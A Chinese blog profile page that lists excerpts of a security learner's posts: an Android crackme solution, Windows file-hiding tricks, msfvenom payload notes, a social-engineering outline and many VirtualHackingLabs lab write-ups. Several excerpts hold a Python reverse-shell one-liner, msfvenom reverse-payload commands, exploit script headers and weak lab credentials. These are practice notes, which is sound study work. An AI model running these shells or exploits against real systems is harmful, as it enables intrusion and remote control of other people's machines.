自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(147)
  • 资源 (2)
  • 收藏
  • 关注

原创 安卓逆向——AliCrackme_1.apk

解法一:随便输入一段数字DDMS抓取到的数据enPassword应该是我们刚才输入的字符串刚才输入的:84848585enPassword:弓门弓门弓义弓义pw应该是正确的密码那么我们输入0123456789输入:0123456789enPassword:丸么广亡门义之尸弓己pw:义弓么丸广之也就是说义 对应 5弓 对应 8么 对应 1丸 对应 0广 对应 2之 对应 6正确密码是:581026解法二:先用Android Killer反编译在Notep

2021-12-18 19:00:03 3877

原创 windows内网

一丶文件隐藏1.使⽤Attrib +s +a +h +r命令就是把原本的⽂件夹增加了系统⽂件属性、存档⽂件属性、只读⽂件属性和隐藏⽂件属性attrib +s +a +h +r c:\test2.系统⽂件夹图标1.建⼀个⽂件夹,假设叫 “我的电脑”。2.然后把要存放的⽂件放进⾥⾯。3.给⽂件夹重新命名为:“我的电脑.{20D04FE0-3AEA-1069-A2D8-08002B30309D}”4.确定后你会发现⽂件夹变成我的电脑的图标,且打开它后进⼊的也是我的电脑。如何打开这个⽂件夹:我们

2021-09-14 23:11:47 291

原创 Payload笔记

一.payload生成msf:–p (- -payload-options)添加载荷payload。–l查看所有payload encoder nops。–f (- -help-formats)输出文件格式。–e编码免杀。–a (- -platform – -help-platforms)选择架构平台x86 | x64 | x86_64–o文件输出。–s生成payload的最大长度,就是文件大小。–b避免使用的字符 例如:不使用 ‘\0f’。–i编码次数。–c添

2021-09-13 21:36:48 2078

原创 社会工程学笔记

一.社会工程学流程:1.信息收集(获得目标的相关信息)2.分析信息并给出目标画像(找到目标的性格特征和社会属性特征以寻找弱点)3.初次接触目标并获得联系渠道(相当于拿一个shell)4.获得目标的信任并尝试扩大行为权限(相当于提权)5.长时间维持目标信任并保持长时间沟通渠道畅通(相当于权限维持)6.根据需求适当扩大以目标为中心的社交链的交互(相当于横向移动,只不过是在目标的社交圈中进行横向)7.结束后隐藏痕迹学习:需要学习社会学、心理学、行为经济学、舆论传播学、博弈论等二、情报分析视觉情

2021-09-12 22:03:44 367

原创 信息收集笔记

一.基本的红队测试流程介绍1.接到项目合同并制定相应计划2.准备相应的工具和材料3.做第一次信息收集4.做漏洞扫描或攻击面测试5.针对突出的攻击面做具体的渗透6.进入环境之后的第二次信息收集7.提升权限8.维持权限9.寻找扩大攻击面的渠道10.清理攻击痕迹11.编写报告二.信息收集的基本要素1.降低被发现的可能,提高隐蔽性2.根据目标的特性进行信息收集三.被动信息收集查询被人已经收集到的结果1.第三方的信息收集机构或平台已经收集到目标的信息2.第三方的信息收集机构或平台将

2021-09-12 20:50:52 227

原创 内网渗透1

目标服务器:192.168.x.120192.168.x.121192.168.x.122121开启了80端口,访问发现是要上传.doc文件,写一个Office宏来get shell1.首先用msf生成payloadmsfvenom -p windows/meterpreter/reverse_http LHOST=192.168.X.Y LPORT=8080 -f csharp2.对生成的payload进行编码using System;using System.Collection

2021-03-14 22:57:08 617 3

原创 virtualhackinglabs靶机 Jennifer 10.12.2.146

wampp: xampp密码好像没啥用啊访问xammp和phpmyadmin都不需要密码

2020-11-30 17:57:10 781

原创 virtualhackinglabs靶机 Web01-Prd 10.12.1.7

39891.txt

2020-11-29 18:43:35 1067

原创 virtualhackinglabs靶机 HELPDESK 10.12.1.11

有一个目录scphelpdesk:helpdesk1234321

2020-11-22 17:29:00 843

原创 virtualhackinglabs靶机 NCM01 10.12.1.164

2020-11-12 16:58:21 440

原创 virtualhackinglabs靶机 Mon01 10.12.2.241

https://github.com/ruthvikvegunta/nagiosxi_rce-to-root/blob/master/nagiosxi.py

2020-11-11 13:56:46 414

原创 virtualhackinglabs靶机 websrv01 10.12.2.243

https://github.com/g0rx/Drupal-SA-CORE-2019-003/blob/master/cve-2019-6340.pysettings.php files found: .

2020-11-10 19:38:47 514

原创 virtualhackinglabs靶机 Mon02 10.12.2.244

2020-11-09 23:58:03 1214

原创 virtualhackinglabs靶机 GRAPHS01 10.12.2.245

漏洞就在脸上了https://github.com/mhaskar/CVE-2020-8813为啥用不了呢

2020-11-09 21:29:20 642

原创 virtualhackinglabs靶机 CMS02 10.12.1.35

2020-11-08 19:09:03 542

原创 virtualhackinglabs靶机 Webadmin 10.12.1.88

2020-11-02 17:33:40 480

原创 virtualhackinglabs靶机 TRAILS 10.12.1.41

2020-11-01 16:22:14 515

原创 virtualhackinglabs靶机 FED 10.12.1.68

2020-11-01 00:13:38 739

原创 virtualhackinglabs靶机 WINAS01 10.12.1.136

https://github.com/ruthvikvegunta/XAMPP-WebDAV-Exploit/blob/master/webdav_exploit.pyhttps://github.com/abatchy17/WindowsExploits/blob/master/MS11-046/MS11-046.exe

2020-10-31 15:21:13 788

原创 virtualhackinglabs靶机 Sam 10.12.1.129

smb 3.5.11漏洞直接root

2020-10-31 02:06:28 531

原创 virtualhackinglabs靶机 JAMES 10.12.1.95

修改一下脚本

2020-10-29 22:16:39 868

原创 virtualhackinglabs靶机 CMS01 10.12.1.177

#!/usr/bin/pythonfrom __future__ import print_functionimport requestsimport sysimport reimport argparseimport base64import osimport randomimport timetry: # Python 2.6-2.7 from HTMLParser import HTMLParserexcept ImportError: # Python 3 ...

2020-10-24 20:08:47 1160

原创 virtualhackinglabs靶机 BREEZE 10.12.1.124

#!/usr/bin/pythonprint "Sync Breeze Enterprise 8.9.24 Buffer Overflow Exploit"print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"#Author website: www.tulpa-security.com#Author twitter: @tulpa_security#Exploit will land you NT AUTHORITY\SYSTE...

2020-10-24 14:46:05 701

aaron

#!/usr/bin/env python# Exploit Title: HttpFileServer 2.3.x Remote Command Execution# Google Dork: intext:"httpfileserver 2.3"# Date: 04-01-2016# Remote: Yes# Exploit Author: Avinash Kumar Thapa aka "-Acid"# Vendor Homepage: http://rejetto.com/...

2020-10-22 17:57:20 600 1

原创 virtualhackinglabs靶机 John 10.12.1.83

第一种:ms17-010第二种:ms08-067cve2019-0708好像也可以利用懒得写了

2020-10-22 15:24:45 260

原创 virtualhackinglabs靶机 AS45 10.12.1.109

有远程命令执行漏洞

2020-10-22 14:48:22 541

原创 virtualhackinglabs靶机 MANTIS 10.12.1.74

看一看密码重置的漏洞得到了webshell晚上再写吧下午上课

2020-10-21 13:17:49 553

原创 virtualhackinglabs靶机 android 10.12.1.48

完成

2020-10-20 22:43:45 294

原创 virtualhackinglabs靶机 STEVEN 10.12.1.36

弱密码admin:admin有命令执行漏洞不用msf的话

2020-10-20 20:57:55 348

原创 virtualhackinglabs靶机 ANTHONY 10.12.1.113

两种方法第一种方法(ms17-010)得到了NAS的凭证第二中方法

2020-10-19 22:09:05 437

原创 virtualhackinglabs靶机 NAS 10.12.1.121

字符串是密钥

2020-10-19 21:50:11 764

原创 virtualhackinglabs靶机 PBX01 10.12.1.117

弱密码admin:adminpython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.2.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'拿w..

2020-10-19 11:39:22 491

原创 virtualhackinglabs靶机 REACT 10.12.1.188

找到了文件算了算了写不动了今天写了6台了吧实在写不动了明天再说

2020-10-18 21:31:18 404

原创 virtualhackinglabs靶机 FW01 10.12.1.200

需要密码admin:admin弱密码猜解成功有漏洞脚本地址验证成功得到webshell直接切换用户root:root弱密码得到权限

2020-10-18 20:17:18 452

原创 virtualhackinglabs靶机 RTR-VHL-01 10.12.2.240

搜一下版本漏洞漏洞脚本地址应该算做完了吧官网的最后一个提示是在FTP中查看key.txt文件就算做完了吧这台机器好没意思

2020-10-18 19:42:37 421

原创 virtualhackinglabs靶机 PBX 10.12.1.17

wordpress用wpscan扫描一下

2020-10-18 16:44:47 923

原创 virtualhackinglabs靶机 NATURAL 10.12.1.77

80端口找到文件上传上传.php文件需要抓包修改一下参数就可以绕过了得到webshell/binbackdoor很可疑下载到本地分析看了半天还是不会提权

2020-10-18 15:47:29 752

原创 virtualhackinglabs靶机 Core 10.12.1.160

tomcat:s3cret直接登录进来了接下来上传文件拿到webshell现在考虑提权的问题linpeas.sh跑了一下发现/usr/lib/pt_chown —> GNU_glibc_2.1/2.1.1_-6(08-1999)利用失败利用失败

2020-10-18 14:19:23 559

原创 virtualhackinglabs靶机 DOLPHIN 10.12.1.58

VHL提示了是dolphin的RCE40756.py完成之前卡在web-dev卡了好久下把那个往后放一放先刷别的靶机

2020-10-17 19:57:01 791

原创 virtualhackinglabs靶机 VPS1723 10.12.1.53

ftp有远程命令执行漏洞脚本python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.2.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'执行命令..

2020-10-17 16:58:31 723

Vulnix.7z靶机

一个vulnhub上的靶机,因为网络原因,下载的特别慢,我下载好,上传上来,供大家学习。如果大家有更好的靶机,请私我。

2020-04-25

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除